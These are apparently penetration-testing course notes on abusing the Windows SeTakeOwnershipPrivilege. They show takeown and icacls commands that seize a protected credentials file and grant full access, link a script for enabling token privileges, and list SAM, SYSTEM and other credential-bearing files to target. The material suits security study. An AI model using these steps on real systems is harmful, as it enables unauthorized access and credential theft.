# SeTakeOwnership

## SeTakeOwnership

> [SeTakeOwnershipPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/take-ownership-of-files-or-other-objects) grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes. This privilege assigns [WRITE\_OWNER](https://docs.microsoft.com/en-us/windows/win32/secauthz/standard-access-rights) rights over an object, meaning the user can change the owner within the object's security descriptor.

Administrators are assigned this privilege by default. It's rare to see it on regular accounts but service accounts can have it as well as backup operators (along with other privileges).

{% hint style="info" %}
Abusing this privilege is a bit of an edge case but can be good to know for accessing files we're not supposed to...
{% endhint %}

### Enabling the privilege

The privilege is disabled by default and can be enabled using this [script](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) which is detailed in [this](https://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/) blog post, as well as [this](https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77) one which builds on the initial concept.

### Launch Attack: Changing ownership of a credentials file

We use the takeown windows binary to take ownership of the file

```
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
```

Now that we have ownership, we can grant ourselves full privileges:

```
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
```

### Files to look at

```shell-session
c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```